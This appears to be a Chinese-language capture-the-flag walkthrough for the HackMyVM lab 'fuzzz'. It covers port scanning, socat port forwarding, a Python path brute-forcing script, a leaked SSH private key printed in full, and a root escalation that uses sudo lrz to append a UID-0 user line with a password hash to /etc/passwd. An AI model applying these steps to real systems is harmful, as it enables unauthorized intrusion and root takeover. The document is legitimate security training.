4.fuzzz

1. 信息收集

┌──(root㉿kali)-[~/Desktop/hmv/fuzzz]
└─# nmap 192.168.56.111 -sCV -p-               
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-19 22:26 EDT
Nmap scan report for 192.168.56.111
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.9 (protocol 2.0)
| ssh-hostkey: 
|   256 b6:7b:e7:e5:b3:33:c7:ff:db:63:5d:b3:75:0d:e2:dd (ECDSA)
|_  256 0a:ce:e5:c3:de:50:9c:6d:b7:0d:de:73:b8:6c:28:55 (ED25519)
5555/tcp open  adb     Android Debug Bridge (token auth required)
MAC Address: 08:00:27:52:E7:DC (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Android; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.05 seconds

adb 连接
5555 - Android Debug Bridge - HackTricks

/home $ netstat -lnpt
netstat: showing only processes with your user ID
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:5555            0.0.0.0:*               LISTEN      2511/python3
tcp        0      0 127.0.0.1:80            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 :::22                   :::*                    LISTEN      -

可以看到本地内网开了一天80
用Socat给他转发出来

socat TCP-LISTEN:1112,fork TCP:127.0.0.1:80

┌──(root㉿kali)-[~/Desktop/tools]
└─# gobuster dir -u http://192.168.56.111:1112 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.111:1112
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/line                 (Status: 200) [Size: 0]
/line2                (Status: 200) [Size: 0]
/line1                (Status: 200) [Size: 0]
/line3                (Status: 200) [Size: 0]
/line4                (Status: 200) [Size: 0]
/line01               (Status: 200) [Size: 0]
/line02               (Status: 200) [Size: 0]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================

这里爆了好多次,又换路径爆,又手动去测。发现特点 size一直都是0, 那说明应该是没有藏文件的。这个url路径就是提示信息。 路径正确就是200 错误就是404。

写个脚本把完整路径爆出来

import requests  
import string  
from urllib.parse import quote  
  
BASE_URL = "http://192.168.56.112:1111"  
CHARSET = string.ascii_letters + string.digits + "!@#$%^&*()-_=+[]{}|;:',.<>?" + '%2f/'  
  
# 防止双斜杠问题  
def clean_url(*parts):  
    return "/".join(part.strip("/") for part in parts)  
  
# 阶段一:枚举所有 line 路径(line1、line2...)  
def find_lines():  
    print("[*] 枚举 line 路径中...")  
    line_list = []  
    i = 1  
    while True:  
        line_url = f"{BASE_URL}/line{i}"  
        r = requests.get(line_url)  
        if r.status_code == 200:  
            print(f"[+] 找到: /line{i}")  
            line_list.append(f"line{i}")  
            i += 1  
        else:  
            print(f"[-] 未找到: /line{i},结束枚举。")  
            break  
    return line_list  
  
# 阶段二:爆破每个 line 路径下的子路径(如 line1/b3)  
def brute_path(line):  
    print(f"\n[*] 开始爆破路径: /{line}/...")  
    found = ""  
  
    while True:  
        for c in CHARSET:  
            try_path = clean_url(BASE_URL, line, found + c)  
            # 检查是否出现了连续的三个斜杠  
            if "///" in try_path:  
                print(f"[!] URL 中出现 '///':{try_path},终止 /{line} 的爆破。")  
                return found  
  
            encoded_path = quote(try_path, safe=':/')  
            r = requests.get(encoded_path)  
  
            if r.status_code == 200:  
                found += c  
                print(f"[+] 命中路径: /{line}/{found}")  
                break  
        else:  
            print(f"[!] 无更多字符命中,终止 /{line} 的爆破。")  
            return found  
  
if __name__ == "__main__":  
    lines = find_lines()  
    results = {}  
  
    for line in lines:  
        path = brute_path(line)  
        results[line] = path  
  
    print("\n[*] 最终结果:")  
    for line, path in results.items():  
        print(f"/{line}/{path}")

Pasted image 20250520135642

这个一眼就是私钥

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgwAAAJDS3+5f0t/u
XwAAAAtzc2gtZWQyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgw
AAAEBCjeRitoZJIm1c4i0VD2Muw5nqgb7zC13vMaxS/la+vSucQUWuMMjqti3kaZQPEy9J
5felyfQYYF+CjURC1emDAAAACWFzYWhpQHBoaQECAwQ=
-----END OPENSSH PRIVATE KEY-----

连接上去,sodo发现有lrz。

lrz用于接收文件。有追加模式,所以直接追加一个到passwd即可

新建一个passwd 替换即可

sudo  lrz  -+

hack:$1$DZpa0Mvh$nRsXiHzu1rp88Hk9.GV9C0:0:0:root:/root:/bin/sh